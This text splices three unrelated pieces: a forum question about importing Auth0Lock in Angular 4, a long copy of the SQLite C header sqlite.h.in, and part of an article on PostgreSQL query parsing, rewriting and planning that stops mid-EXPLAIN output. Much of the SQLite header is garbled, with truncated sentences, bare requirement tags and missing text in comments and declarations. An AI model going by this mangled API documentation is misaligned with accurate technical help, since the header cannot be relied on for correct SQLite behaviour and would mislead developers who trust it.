My app was working with Angular 2, but it stopped working now that I’ve changed to Angular 4. What causes problem is that before I was using: // Avoid name not found warnings let Auth0Lock = require('auth0-lock').default; But now that gives me this error: ERROR in /blablabla…/services/auth.service.ts (6,17): Cannot find name 'require'. So I’ve tried a lot of possible configurations, including the new guide in that suggest to use: declare var Auth0Lock: any; but I kept getting errors, in this case: MainNavigationComponent.html:2 ERROR ReferenceError: Auth0Lock is not defined Unhandled Promise rejection: Auth0Lock is not defined ; Zone: <root> ; Task: Promise.then ; Value: ReferenceError: Auth0Lock is not defined My working solution was to go into node_modules/auth0-lock/lib/index.js and change exports.default = Auth0Lock; into exports.Auth0Lock = Auth0Lock; While using import { Auth0Lock } from "auth0-lock"; To import it, which worked perfectly. However editing stuff in node_modules is a bad idea, we all know that, but I cannot be blocked by this and I need to keep working while I find a better solution. So how am I supposed to import Auth0Lock? From my package.json: "angular2-jwt": "^0.2.0", "auth0-lock": "^10.14.0"
https://community.auth0.com/t/how-to-importn-auth0-lock-in-angular-cli-application/6151
CC-MAIN-2018-30
refinedweb
205
59.5
I'm glad my reply can help and thank you for your sharing ! Best, Bingchen I'm glad my reply can help and thank you for your sharing ! Best, Bingchen Hi JF, You are welcome. I'm glad that my code can give you some ideas. You can see from the code in the source file cerebro.py that although multiple input variables are given for plot function, some of them are not used in the plot function at all ==|||. Thus I guess that the plot function only give you some basic frames on these functions and you have to define by yourself if you want some specific ideas. For more about the plot, you can see doc for matplotlib.pyplot. Cheers, Bingchen I got the similar problem, I can't change plot size and save picture either. Thus I just rewrite the function in the cerebro.py file. This is my code, I hope this can give you some help. def plot(self, plotter=None, numfigs=1, iplot=True, start=None, end=None, width=16, height=9, dpi=300, tight=True, use=None,path = ''' if self._exactbars > 0: return if not plotter: from . import plot if self.p.oldsync: plotter = plot.Plot_OldSync(**kwargs) else: plotter = plot.Plot(**kwargs) # pfillers = {self.datas[i]: self._plotfillers[i] # for i, x in enumerate(self._plotfillers)} # pfillers2 = {self.datas[i]: self._plotfillers2[i] # for i, x in enumerate(self._plotfillers2)} import matplotlib.pyplot as plt figs = [] for stratlist in self.runstrats: for si, strat in enumerate(stratlist): rfig = plotter.plot(strat, figid=si * 100, numfigs=numfigs, iplot=iplot, start=start, end=end, use=use) # pfillers=pfillers2) figs.append(rfig) fig = plt.gcf() plotter.show() fig.set_size_inches(width, height) fig.savefig(path,dpi = dpi) return figs Thank you for your quick reply. cerebro.broker.get_fundvalue() can give me the value. But the problem is that I want to get the value in the next() for Strategy class. Thus get_fundvalue is not available..
https://community.backtrader.com/user/bingchen-liu
CC-MAIN-2022-27
refinedweb
328
70.9
Artifact a573ab3a22256fc6c28b8f27d5af446f2b712a31: - File src/sqlite.h.in — part of check-in [d7e2f0d2] at 2008-07-11 16:15:18 on branch trunk — Additional test coverage for the btree module. Remove the failsafe() macro and replace it with ALWAYS() and NEVER(). (CVS 5395) (user: drh size: 28250.368 2008/07/11 16:15:18 /* ** Ensure these symbols were not defined by some previous header file. */ #ifdef SQLITE_VERSION # undef SQLITE_VERSION #endif #ifdef SQLITE_VERSION_NUMBER # undef SQLITE_VERSION_NUMBER #endif /* ** CAPI3REF: Compile-Time Library Version Numbers the release number and is incremented with ** each release but resets back to 0 whenever Y is incremented. ** ** See also: [sqlite3_libversion()] and [sqlite3_libversion_number()]. ** **, ** a program having to write a lot of C code. The UTF-8 encoded ** SQL statements are passed in as the second parameter to sqlite3_exec(). ** The statements are evaluated one by one until either an error or ** an interrupt is encountered, or until they are all done. The 3rd parameter ** is an optional callback that is invoked once for each row of any query ** results produced by the SQL statements. The 5th parameter tells where ** to write any error messages. ** ** The} ** KEYWORDS: SQLITE_OK {error code} {error codes} ** KEYWORDS: {result code} {result codes} ** ** Many SQLite functions return an integer result code from the set shown ** here in order to indicates success or failure. ** ** New error codes may be added in future versions of SQLite. ** ** See also: [SQLITE_IOERR_READ | extended } ** ** These bit values are intended for use in the ** 3rd parameter to the [sqlite3_open_v2()] interface and ** in the 4th parameter_TRANSIENT_DB 0x00000400 #define SQLITE_OPEN_MAIN_JOURNAL 0x00000800 #define SQLITE_OPEN_TEMP_JOURNAL 0x00001000 #define SQLITE_OPEN_SUBJOURNAL 0x00002000 #define SQLITE_OPEN_MASTER_JOURNAL 0x00004000 #define SQLITE_OPEN_NOMUTEX 0x00008000 /* ** CAPI3REF: Device Characteristics {F10240} ** ** The xDeviceCapabilities {F10250} ** ** {F10260} ** **. The SQLITE_SYNC_NORMAL flag means ** to use normal fsync() semantics. The SQLITE_SYNC_FULL flag means ** to use Mac OS-X style fullsync instead of fsync(). */ #define SQLITE_SYNC_NORMAL 0x00002 #define SQLITE_SYNC_FULL 0x00003 #define SQLITE_SYNC_DATAONLY 0x00010 /* ** CAPI3REF: OS Interface Open File Handle {F11110} ** ** {F11*); /* Additional methods may be added in future releases */ }; /* ** CAPI3REF: Standard File Control Opcodes {F11310} ** **. */ #define SQLITE_FCNTL_LOCKSTATE 1 /* ** CAPI3REF: Mutex Handle {F17110} ** ** {F11140} ** ** An instance of the sqlite3_vfs object defines the interface between ** the SQLite core and the underlying operating system. The "vfs" ** in the name of the object stands for "virtual file system". ** **. ** ** {F11141} SQLite will guarantee that the zFilename parameter to xOpen ** is either a NULL pointer or string obtained ** from xFullPathname(). SQLite further guarantees that ** the string will be valid and unchanged until xClose() is ** called. {END} Becasue of the previous sentense, ** the [sqlite3_file] can safely store a pointer to the ** filename if it needs to remember the filename for some reason. ** If the zFilename parameter is xOpen is a NULL pointer then xOpen ** must invite its own temporary name for the file. Whenever the ** xFilename parameter is NULL it will also be the case that the ** flags parameter will include [SQLITE_OPEN_DELETEONCLOSE]. ** ** }] ** </ul> } *); /* New fields may be appended in figure versions. The iVersion ** value will increment whenever this happens. */ }; /* **. */ int sqlite3_initialize(void); int sqlite3_shutdown(void); int sqlite3_os_init(void); int sqlite3_os_end(void); /* ** CAPI3REF: Configuring The SQLite Library {F10145} ** **()]. **]. */ int sqlite3_config(int, ...); /* ** CAPI3REF: Memory Allocation Routines {F101].. ** ** {F10160} ** ** These constants are the available integer configuration options that ** can be passed as the first argument to the [sqlite3_config()] interface. ** ** .</dd> ** ** <dt>SQLITE_CONFIG_SERIALIZED</dt> ** <dd>There are no arguments to this option..</dd> ** ** .</dd> ** ** > ** ** <dt>SQLITE_CONFIG_MEMSTATUS</dt> ** <dd>This option takes single.</dd> ** ** .</dd> ** ** <dt>SQLITE_CONFIG_GETMALLOC<.</dd> */ * */ /* **. If no successful INSERTs ** have ever occurred on. ** **}3_int64 sqlite3_last_insert_rowid(sqlite3*); /* ** CAPI3REF: Count The Number Of Rows Modified {F12240} ** ** are not counted. Use the [sqlite3_total_changes()] function ** to find the total number of changes including changes caused by triggers. ** **. ** **} ** ** This function returns the number of row changes caused by INSERT, ** UPDATE or DELETE statements since the [database connection] was opened. ** The count includes all changes from all trigger contexts. However, **} ** **. ** ** A call to sqlite3_interrupt() has no effect on SQL statements ** that are started after sqlite3_interrupt() returns. ** ** statements thus ** will not detect syntactically incorrect SQL. ** ** INVARIANTS: ** ** {F10511} A successful evaluation of [sqlite3_complete()] or ** [sqlite3_complete16()] functions shall ** return a numeric 1 if and only if the last non-whitespace ** token in their input is a semicolon that is not in between ** the BEGIN and END of a CREATE TRIGGER statement. ** ** {F10512} If a memory allocation error occurs during an invocation ** of [sqlite3_complete()] or [sqlite3_complete16()] then the ** routine shall return [SQLITE_NOMEM]. ** ** LIMITATIONS: ** ** {A10512} The input to [sqlite3_complete()] must be a zero-terminated ** UTF-8 string. ** ** sets a callback function that might be invoked whenever ** an attempt is made to open a database table that another thread ** or process has locked. ** ** If the busy callback is NULL, then [SQLITE_BUSY] or [SQLITE_IOERR_BLOCKED] ** is returned immediately upon encountering the lock. If the busy callback ** is not NULL, then the callback will be invoked with two arguments. ** ** The first argument to the handler is a copy of the void* pointer which ** is the third argument to sqlite3_busy_handler(). The second argument to ** the handler callback go ahead and return [SQLITE_BUSY] ** or [SQLITE_IOERR_BLOCKED]="/cvstrac/wiki?p=CorruptionFollowingBusyError"> ** CorruptionFollowingBusyError</a> wiki page for a discussion of why ** this is important. ** ** There can only be a single busy handler defined for each ** [database connection]. Setting a new busy handler clears any ** previously set handler. Note that calling [sqlite3_busy_timeout()] ** will also set or clear the busy handler. ** ** INVARIANTS: ** ** {F12311} The [sqlite3_busy_handler(D,C,A)] function shall replace ** busy callback in the [database connection] D with a new ** a new busy handler C and application data pointer A. ** ** {F12312} Newly created [database connections] shall have a busy ** handler of NULL. ** ** {F12314} When two or more [database connections] share a ** [sqlite3_enable_shared_cache | common cache], ** the busy handler for the database connection currently using ** the cache shall be invoked when the cache encounters a lock. ** ** {F12316} If a busy handler callback returns zero, then the SQLite interface ** that provoked the locking event shall return [SQLITE_BUSY]. ** ** {F12318} SQLite shall must. {F12343}] any any given moment. If another busy handler ** was defined (using [sqlite3_busy_handler()]) prior to calling ** this routine, that other busy handler is cleared. ** ** INVARIANTS: ** ** {F12341} The [sqlite3_busy_timeout()] function shall override any prior ** [sqlite3_busy_timeout()] or [sqlite3_busy_handler()] setting ** on the same [database connection]. ** ** {F12343} If the 2nd parameter to [sqlite3_busy_timeout()] is less than ** or equal to zero, then the busy handler shall be cleared so that ** all subsequent locking events immediately return [SQLITE_BUSY]. ** ** {F12344} If the 2nd parameter to [sqlite3_busy_timeout()] is a positive ** number N, then a busy handler shall be set that repeatedly calls ** the xSleep() method in the [sqlite3_vfs | VFS interface] until ** either the lock clears or until the cumulative sleep time ** reported back by xSleep() exceeds N milliseconds. */ int sqlite3_busy_timeout(sqlite3*, int ms); /* ** CAPI3REF: Convenience Routines For Running Queries {F12370} ** ** Definition: A <b>result table</b>: ** ** <blockquote><pre> ** Name | Age ** ----------------------- ** Alice | 43 ** Bob | 28 ** Cindy | 21 ** </pre></blockquote> ** ** sqlite3_get_table() function evaluates one or more ** semicolon-separated SQL statements in the zero-terminated UTF-8 ** string of its 2nd parameter. It returns a result table to the ** pointer given in its 3rd parameter. ** ** After the calling function has finished using the result, it should ** pass the pointer to the result table()]. ** ** INVARIANTS: ** ** {F12371} If a [sqlite3_get_table()] fails a memory allocation, then ** it shall free the result table under construction, abort the ** query in process, skip any subsequent queries, set the ** *pazResult output pointer to NULL and return [SQLITE_NOMEM]. ** ** {F12373} If the pnColumn parameter to [sqlite3_get_table()] is not NULL ** then a successful invocation of [sqlite3_get_table()] shall ** write the number of columns in the ** result set of the query into *pnColumn. ** ** {F12374} If the pnRow parameter to [sqlite3_get_table()] is not NULL ** then a successful invocation of [sqlite3_get_table()] shall ** writes the number of rows in the ** result set of the query into *pnRow. ** ** {F12376} A successful invocation of [sqlite3_get_table()] that computes ** N rows of result with C columns per row shall make *pazResult ** point to an array of pointers to (N+1)*C strings where the first ** C strings are column names as obtained from ** [sqlite3_column_name()] and the rest are column result values ** obtained from [sqlite3_column_text()]. ** ** {F12379} The values in the pazResult array returned by [sqlite3_get_table()] ** shall remain valid until cleared by [sqlite3_free_table()]. ** ** {F12382} When an error occurs during evaluation of [sqlite3_get_table()] ** the function shall set *pazResult to NULL, write an error message ** into memory obtained from [sqlite3_malloc()], make ** **pzErrmsg point to that error message, and return a ** appropriate [error code]. */); /* **(). ** ** The sqlite3_realloc() interface attempts to resize a ** prior memory allocation to be at least N bytes, where N is the ** second parameter. The memory allocation to be resized is the first ** parameter. If the first parameter to sqlite3_realloc() ** is a NULL pointer then its behavior is identical to calling ** sqlite3_malloc(N) where N is the second parameter to sqlite3_realloc(). ** If the second parameter to sqlite3_realloc() is zero or ** negative then the behavior is exactly the same as calling ** sqlite3_free(P) where P is the first parameter to sqlite3_realloc(). ** sqlite3_realloc() returns a pointer to a memory allocation ** of at least N bytes in size or NULL if sufficient memory is unavailable. ** If M is the size of the prior allocation, then min(N,M) bytes ** of the prior allocation are copied into the beginning of buffer returned ** by sqlite3_realloc() and the prior allocation is freed. ** If sqlite3_realloc() returns NULL, then the prior allocation ** is not freed. ** ** The memory returned by sqlite3_malloc() and sqlite3_realloc() ** is always aligned to at least an 8 byte boundary. {END} ** ** The default implementation of the memory allocation subsystem uses ** the malloc(), realloc() and free() provided by the standard C library. ** {F17382} However, if SQLite is compiled with the ** SQLITE_MEMORY_SIZE=<i>NNN</i> C preprocessor macro (where <i>NNN</i> ** is an integer), then SQLite create a static array of at least ** <i>NNN</i> bytes in size and uses that array for all of its dynamic ** memory allocation needs. {END} Additional memory allocator options ** may be added in future releases. ** **. ** ** The Windows OS interface layer calls ** the system malloc() and free() directly when converting ** filenames between the UTF-8 encoding used by SQLite ** and whatever filename encoding is used by the particular Windows ** installation. Memory allocation errors are detected, but ** they are reported back as [SQLITE_CANTOPEN] or ** [SQLITE_IOERR] rather than [SQLITE_NOMEM]. ** **}. */ sqlite3_int64 sqlite3_memory_used(void); sqlite3_int64 sqlite3_memory_highwater(int resetFlag); /* ** CAPI3REF: Pseudo-Random Number Generator {F17390} ** ** first time this routine is invoked (either internally or by ** the application) the PRNG is seeded using randomness obtained ** from the xRandomness method of the default [sqlite3_vfs] object. ** On all subsequent invocations, the pseudo-randomness is generated ** internally and without recourse to the [sqlite3_vfs] xRandomness ** method. ** ** INVARIANTS: ** ** {F17392} The [sqlite3_randomness(N,P)] interface writes N bytes of ** high-quality pseudo-randomness into buffer P. */ void sqlite3_randomness(int N, void *P); /* ** CAPI3REF: Compile-Time Authorization Callbacks {F12500} ** ** This routine registers. If the authorizer. ** ** strings that contain additional ** details about the action to be authorized. ** ** An authorizer is used when [sqlite3_prepare | [sqlite3_prepare |. ** ** triggered sub operation. ** ** The default encoding for the database will be UTF-8 if ** sqlite3_open() or sqlite3_open_v2() is called and ** UTF-16 in the native byte order if sqlite3_open16() is used. ** ** can take one of ** the following three values, optionally combined with the ** SQLITE_OPEN_NOMUTEX flag: ** ** the opened database handle ** is not threadsafe. If two threads attempt to use the database handle or ** any of it's statement handles simultaneously, the results will be ** unpredictable. ** **. ** ** . */ */ ); /* ** CAPI3REF: Error Codes And Messages {F12800} ** ** The sqlite3_errcode() interface returns the numeric [result code] or ** [extended result code] for the most recent failed sqlite3_* API call ** associated with a [database connection]. If a prior API call failed ** but the most recent API call succeeded, the return value from ** sqlite3_errcode() is undefined. ** **. ** ** If an interface fails with SQLITE_MISUSE, that means the interface ** was invoked incorrectly by the application. In that case, the ** error code and message may or may not be set. ** ** represents a single SQL statement. ** This object the: Run-time Limits {F12760} ** **. The function returns the old limit. ** ** If the new limit is a negative number, the limit is unchanged. ** For the limit category of SQLITE_LIMIT_XYZ there is a hard upper ** bound set by a compile-time C preprocessor macro named SQLITE_MAX_XYZ. ** (The "_LIMIT_" in the name is changed to "_MAX_".) ** Attempts to increase a limit above its hard upper bound are ** silently truncated to the hard upper limit. ** ** Run time limits are intended for use in applications that manage ** both their own internal database and also databases that are controlled ** by untrusted external sources. An example application might be a ** webbrowser]. ** ** This interface is currently considered experimental and is subject ** to change or removal without prior notice. ** **.</dd> ** ** <dt>SQLITE_LIMIT_COLUMN</dt> ** <dd>The maximum number of columns in a table definition or in the ** result set of a SELECT or the maximum number of columns in an index ** or in an ORDER BY or GROUP BY clause.</dd> ** ** <dt>SQLITE_LIMIT_EXPR_DEPTH</dt> ** <dd>The maximum depth of the parse tree on any expression.</dd> ** ** <dt>SQLITE_LIMIT_COMPOUND_SELECT</dt> ** <dd>The maximum number of terms in a compound SELECT statement.</dd> ** ** <dt>SQLITE_LIMIT_VDBE_OP</dt> ** <dd>The maximum number of instructions in a virtual machine program ** used to implement an SQL statement.</dd> ** ** <dt>SQLITE_LIMIT_FUNCTION_ARG</dt> ** <dd>The maximum number of arguments on a function.</dd> ** ** <dt>SQLITE_LIMIT_ATTACHED</dt> ** <dd>The maximum number of attached databases.</dd> ** ** <dt>SQLITE_LIMIT_LIKE_PATTERN_LENGTH</dt> ** <dd>The maximum length of the pattern argument to the LIKE or ** GLOB operators.</dd> ** ** <dt>SQLITE_LIMIT_VARIABLE_NUMBER</dt> ** <dd>The maximum number of variables in an SQL statement that can ** be bound.</dd> ** </dl> */ /* ** CAPI3REF: Compiling An SQL Statement {F13010} ** KEYWORDS: {SQL statement compiler} ** ** To execute an SQL query, it must first be compiled into a byte-code ** program using one of these routines. ** ** The first argument, "db", is a [database connection] obtained from a ** prior call to [sqlite3_open()], [sqlite3_open_v2()] or [sqlite3_open16()]. ** **' or '\u0000' character or **. ** ** . ** {A13018} The calling procedure is responsible for deleting the compiled ** SQL statement using [sqlite3_finalize()] after it has finished with it. ** ** On success, [SQLITE_OK] is returned, ** [error codes] or [extended error codes].> ** ** terms "protected" and "unprotected" refer to whether or not ** a mutex is held._blob | sqlite3_value_type()] family of ** interfaces require protected sqlite3_value objects. */ typedef struct Mem sqlite3_value; /* ** CAPI3REF: SQL Function Context Object {F16001} ** **> ** ** In the parameter forms shown above NNN is an integer literal, ** and VVV is an alpha-numeric parameter name.. ** ** ** the number of bytes up to the first zero terminator. ** ** The fifth argument to sqlite3_bind_blob(), sqlite3_bind_text(), and ** sqlite3_bind_text16() is a destructor used to dispose of the BLOB or ** string after SQLite has finished with it. ** [sqlite3_blob_open | incremental BLOB I/O] routines. **]. ** also referred to_blob|sqlite3_bind()], ** [sqlite3_bind_parameter_count()], and ** [sqlite3_bind_parameter_index()]. ** **_blob|sqlite3_bind()], ** [sqlite3_bind_parameter_count()], and ** [sqlite3_bind_parameter_index()]. ** **} ** ** These routines provide a means to determine what column of what ** table in which database a result of a [SELECT] statement comes] C} If two or more threads call one or more ** [sqlite3_column_database_name | column metadata interfaces] ** for the same [prepared statement] and result } ** **: Result Values From A Query {F13800} ** KEYWORDS: {column access functions} ** ** These routines form the "result set query". ** **. ** **: ** ** <blockquote> ** <table border="1"> ** <tr><th> Internal<br>Type <th> Requested<br>.< sometimes they **]. ** **} ** ** The sqlite3_finalize() function is called to delete a [prepared statement]. ** If the statement was executed successfully or not executed at all, then ** SQLITE_OK is returned. If execution of the statement failed then an ** [error code] or [extended error code] is returned. ** ** This routine can be called at any point during the execution of the ** [prepared statement]. If the virtual machine has not ** completed execution when this routine is called, that is like ** encountering an error or an [sqlite3_interrupt | interrupt]. ** Incomplete updates may be rolled back and transactions canceled, ** depending on the circumstances, and the ** [error code] returned will be [SQLITE_ABORT]. ** **} ** KEYWORDS: {function creation routines} ** KEYWORDS: {application-defined SQL function} ** KEYWORDS: {application-defined SQL functions} ** ** These two functions (collectively known as "function creation routines") ** are used to add SQL functions or aggregates or to redefine the behavior ** of existing SQL functions or aggregates. The only difference between the ** two is that the second parameter, the name of the (scalar) function or ** aggregate, is encoded in UTF-8 for sqlite3_create_function() and UTF-16 ** for sqlite3_create_function16(). ** ** The first parameter is the [database connection] to which the SQL ** function is to be added. If a single program uses more than one database ** connection internally, then SQL functions must be added individually to ** each database connection. ** ** [SQLITE_ERROR] being returned. ** ** callbacks. ** ** It is permitted to register multiple implementations of the same ** functions with the same name but with either differing numbers of ** arguments or differing preferred text encodings. SQLite will use ** the implementation most closely matches the way in which the ** SQL function is used. ** **} ** ** [SQLITE_INTEGER |. ** ** called for a ** particular aggregate, SQLite allocates nBytes of memory, zeroes out} ** ** The following two functions may be used by scalar SQL functions to ** associate metadata with argument values. If the same value is passed to ** multiple invocations of the same SQL function during query execution, under ** some circumstances the associated metadata may be preserved. This may ** be used, for example, to add a regular-expression matching scalar ** function. The compiled version of the regular expression is stored as ** metadata} ** **() interfaces set the result of ** the application-defined function to be a BLOB containing all zero ** bytes and N bytes in size, where N is the value of the 2nd parameter. ** **_toobig() interface causes SQLite to throw an error ** indicating that a string or BLOB is to long to represent. ** ** The sqlite3_result ** sqlite3_result_blob is the special constant SQLITE_STATIC, then SQLite ** assumes that the text or BLOB result is in constant space and does not ** copy the it or call a destructor. ** **} ** ** These functions are used to add new collation sequences to the ** [database connection] may. The ** third argument might also be [SQLITE_UTF16_ALIGNED] to indicate that ** the routine expects pointers to 16-bit word aligned strings ** of UTF-supplied routine are two strings, ** each represented by a (length, data) pair and encoded in the encoding ** that was passed as the third argument when the collation sequence was ** registered. {END} The application defined collation routine should ** return negative, zero or positive if the first string is less than, ** equal to, or greater than the second string. i.e. (STRING1 - STRING2). ** ** The sqlite3_create_collation_v2() works like sqlite3_create_collation() ** except [database connection] is closed ** using [sqlite3_close()]. ** **. */ void *zName, int eTextRep, void*, int(*xCompare)(void*,int,const void*,int,const void*) ); /* ** CAPI3REF: Collation Needed Callbacks {F16700} ** ** To avoid having to register all collation sequences before a database ** can be used, a single callback function may be registered with the ** [database connection] to be called whenever an undefined collation ** sequence is required. ** ** If the function is registered using the sqlite3_collation_needed() API, ** then it is passed the names of undefined collation sequences as strings ** encoded in UTF-8. } ** KEYWORDS: {autocommit mode} ** **. ** ** [database connection] handle ** to which a [prepared statement] belongs. The database handle returned by ** sqlite3_db_handle is the same database handle that was the first argument ** to the [sqlite3_prepare_v2()] call (or its variants) that was used to ** create the statement in the first place. ** ** limit, [sqlite3_release_memory()] is invoked one or ** more times to free up some space before the allocation is performed. ** ** the soft heap limit cannot be} ** ** This routine returns metadata about a specific column of a specific ** database table accessible using the [database. Neither of these parameters ** may be NULL. ** ** [error code] is returned and an error message left ** in the [database connection] (to be retrieved using sqlite3_errmsg()). ** ** This API is only available if the library was compiled with the ** [SQLITE_ENABLE_COLUMN_METADATA] C */ ); /* ** CAPI3REF: Load An Extension } ** **. See ticket #1863. ** ** . */ stabil; /* ** CAPI3REF: Virtual Table Object . */); }; /* ** CAPI3REF: Virtual Table Indexing Information {F18100} ** KEYWORDS: sqlite3_index_info ** **: ** ** <pre>column OP expr</pre> ** **). ** ** This interface is experimental and is subject to change or ** removal in future releases of SQLite. */ struct sqlite3_index_info { /* Inputs */ int nConstraint; /* Number of entries in aConstraint */ struct sqlite3_index_constraint { int iColumn; /* Column on left-hand side of constraint */ /* ** CAPI3REF: Register A Virtual Table Implementation {F18200} ** ** ** ** Every module implementation uses a subclass of the following structure ** to describe a particular instance of the module.(). ** ** This interface is experimental and is subject to change or ** removal in future releases of SQLite. */ struct sqlite3_vtab { const sqlite3_module *pModule; /* The module for this virtual table */ int nRef; /* Used internally */ char *zErrMsg; /* Error message from sqlite3_mprintf() */ /* Virtual table implementations will typically add additional fields */ }; /* ** CAPI3REF: Virtual Table Cursor Object {F18020} ** KEYWORDS: sqlite3_vtab_cursor ** **. ** ** This interface is experimental and is subject to change or ** removal in future releases of SQLite. */ struct sqlite3_vtab_cursor { sqlite3_vtab *pVtab; /* Virtual table of this cursor */ /* Virtual table implementations will typically add additional fields */ }; /* ** CAPI3REF: Declare The Schema Of A Virtual Table {F18280} ** **} ** KEYWORDS: {BLOB handle} {BLOB handles} ** ** An instance of this object represents an open BLOB on which ** [sqlite3_blob_open |. */ typedef struct sqlite3_blob sqlite3_blob; /* ** CAPI3REF: Open A BLOB For Incremental I/O {F17810} ** ** This interfaces opens a [BLOB handle | handle] to the BLOB located ** in row iRow, column zColumn, table zTable in database zDb; ** in other words, the same BLOB that would be selected by: ** ** <pre> ** SELECT zColumn FROM zDb.zTable WHERE rowid = iRow; ** </pre> {END} ** ** If the flags parameter is non-zero, the the BLOB is opened for read ** and write access. If it is zero, the BLOB is opened for read access. ** ** Note that the database name is not the filename that contains ** the database but rather the symbolic name of the database that ** is assigned} ** **. ** ** An attempt to read from an expired [BLOB handle] fails with an ** error code of [SQLITE_ABORT]. ** ** On success, SQLITE_OK is returned. ** Otherwise, an [error code] or an [extended error code] is returned. ** **} ** ** This function is used to write data into an open [BLOB handle] from a ** caller-supplied buffer. N bytes of data are copied from the buffer Z ** into the open BLOB, starting at offset iOffset. ** **. If N. ** ** On success, SQLITE_OK is returned. ** Otherwise, an [error code] or an [extended error code] is returned. ** **} ** <li> SQLITE_MUTEX_STATIC_LRU ** <li> SQLITE_MUTEX_STATIC_LRU2 ** </ul> ** ** } ** ***); /* ** CAPI3REF: Mutex Methods Object {F17120} ** **. ** {F17001} The xMutexInit routine shall be called by SQLite. > ** ** *); }; /* ** CAPI3REF: Mutex Verification}() */ #define SQLITE_MUTEX_STATIC_LRU 6 /* lru page list */ #define SQLITE_MUTEX_STATIC_LRU2} ** **_test_control(int op, ...); /* ** CAPI3REF: Testing Interface Operation Codes {F11410} ** ** /* ** CAPI3REF: SQLite Runtime Status {F17200} ** **. ** ** This interface is experimental and is subject to change or ** removal in future releases of SQLite. */ int sqlite3_status(int op, int *pCurrent, int *pHighwater, int resetFlag); /* ** CAPI3REF: Status Parameters {F17250} ** **_PAGECACHE_USED</dt> ** <dd>This parameter returns the number of pages used out of the ** page cache buffer /* ** Undo the hack that converts floating point types to integer for ** builds on processors without floating point support. */ #ifdef SQLITE_OMIT_FLOATING_POINT # undef double #endif #ifdef __cplusplus } /* End of the 'extern "C"' block */ #endif #endif
https://sqlite.org/src/artifact/a573ab3a22256fc6
CC-MAIN-2019-51
refinedweb
3,745
52.39
# Queries in PostgreSQL. Query execution stages Hello! I'm kicking off another article series about the internals of PostgreSQL. This one will focus on query planning and execution mechanics. This series will cover: 1. Query execution stages (this article) 2. Statistics 3. Sequential scan 4. Index scan 5. Nested-loop join 6. Hash join 7. Merge join This article borrows from our course [QPT Query Optimization](https://postgrespro.ru/education/courses/QPT) (available in English soon), but focuses mostly on the internal mechanisms of query execution, leaving the optimization aspect aside. Please also note that this article series is written with PostgreSQL 14 in mind. **Simple query protocol** The fundamental purpose of the PostgreSQL client-server protocol is twofold: it sends SQL queries to the server, and it receives the entire execution result in response. The query received by the server for execution goes through several stages. **Parsing** First, the query text is *parsed*, so that the server understands exactly what needs to be done. **Lexer and parser.** The *lexer* is responsible for recognizing *lexemes* in the query string (such as SQL keywords, string and numeric literals, etc.), and the *parser* makes sure that the resulting set of lexemes is grammatically valid. The parser and lexer are implemented using the standard tools Bison and Flex. The parsed query is represented as an abstract syntax tree. Example: ``` SELECT schemaname, tablename FROM pg_tables WHERE tableowner = 'postgres' ORDER BY tablename; ``` Here, a tree will be built in backend memory. The figure below shows the tree in a highly simplified form. The nodes of the tree are labeled with the corresponding parts of the query. ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/f5d/37b/340/f5d37b340ded248e1545b3e7cc88702f.png)RTE is an obscure abbreviation that stands for "Range Table Entry." The name "range table" in the PostgreSQL source code refers to tables, subqueries, results of joins–in other words, any record sets that SQL statements operate on. **Semantic analyzer.** The *semantic analyzer* determines whether there are tables and other objects in the database that the query refers to by name, and whether the user has the right to access these objects. All the information required for semantic analysis is stored in the system catalog. The semantic analyzer receives the parse tree from the parser and rebuilds it, supplementing it with references to specific database objects, data type information, etc. If the parameter *debug\_print\_parse* is on, the full tree will be displayed in the server message log, although there is little practical sense in this. **Transformation** Next, the query can be *transformed (rewritten)*. Transformations are used by the system core for several purposes. One of them is to replace the name of a view in the parse tree with a subtree corresponding to the query of this view. `pg_tables` from the example above is a view, and after transformation the parse tree will take the following form: ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/ec9/495/c0f/ec9495c0f33549512bdfe4c70ec1fe26.png)This parse tree corresponds to the following query (although all manipulations are performed only on the tree, not on the query text): ``` SELECT schemaname, tablename FROM ( -- pg_tables SELECT n.nspname AS schemaname, c.relname AS tablename, pg_get_userbyid(c.relowner) AS tableowner, ... FROM pg_class c LEFT JOIN pg_namespace n ON n.oid = c.relnamespace LEFT JOIN pg_tablespace t ON t.oid = c.reltablespace WHERE c.relkind = ANY (ARRAY['r'::char, 'p'::char]) ) WHERE tableowner = 'postgres' ORDER BY tablename; ``` The parse tree reflects the syntactic structure of the query, but not the order in which the operations will be performed. Row-level security is implemented at the transformation stage. Another example of the use of transformations by the system core is the implementation of SEARCH and CYCLE clauses for recursive queries in version 14. PostgreSQL supports custom transformations, which the user can implement using the *rewrite rule system*. The rule system was intended as [one of the primary features](https://dsf.berkeley.edu/papers/ERL-M85-95.pdf) of Postgres. The rules were supported from the project's foundation and were repeatedly redesigned during early development. This is a powerful mechanism but difficult to understand and debug. There was even a proposal to remove the rules from PostgreSQL entirely, but it did not find general support. In most cases, it is safer and more convenient to use triggers instead of rules. If the parameter *debug\_print\_rewritten* is on, the complete transformed parse tree will be displayed in the server message log. **Planning** SQL is a declarative language: a query specifies *what* to retrieve, but not *how* to retrieve it. Any query can be executed in a number of ways. Each operation in the parse tree has multiple execution options. For example, you can retrieve specific records from a table by reading the whole table and discarding rows you don't need, or you can use indexes to find the rows that match your query. Data sets are always joined in pairs. Variations in the order of joins result in a multitude of execution options. Then there are various ways to join two sets of rows together. For example, you could go through the rows in the first set one by one and look for matching rows in the other set, or you could sort both sets first, and then merge them together. Different approaches perform better in some cases and worse in others. The optimal plan may execute faster than a non-optimal one by several orders of magnitude. This is why the *planner*, which *optimizes* the parsed query, is one of the most complex elements of the system. **Plan tree.** The execution plan can also be presented as a tree, but with its nodes as physical rather than logical operations on data. ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/7ec/e2d/7f8/7ece2d7f8a62afe7ae25d033a977fcdf.png)If the parameter *debug\_print\_plan* is on, the full plan tree will be displayed in the server message log. This is highly impractical, as the log is extremely cluttered as it is. A more convenient option is to use the EXPLAIN command: ``` EXPLAIN SELECT schemaname, tablename FROM pg_tables WHERE tableowner = 'postgres' ORDER BY tablename; QUERY PLAN −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Sort (cost=21.03..21.04 rows=1 width=128) Sort Key: c.relname −> Nested Loop Left Join (cost=0.00..21.02 rows=1 width=128) Join Filter: (n.oid = c.relnamespace) −> Seq Scan on pg_class c (cost=0.00..19.93 rows=1 width=72) Filter: ((relkind = ANY ('{r,p}'::"char"[])) AND (pg_g... −> Seq Scan on 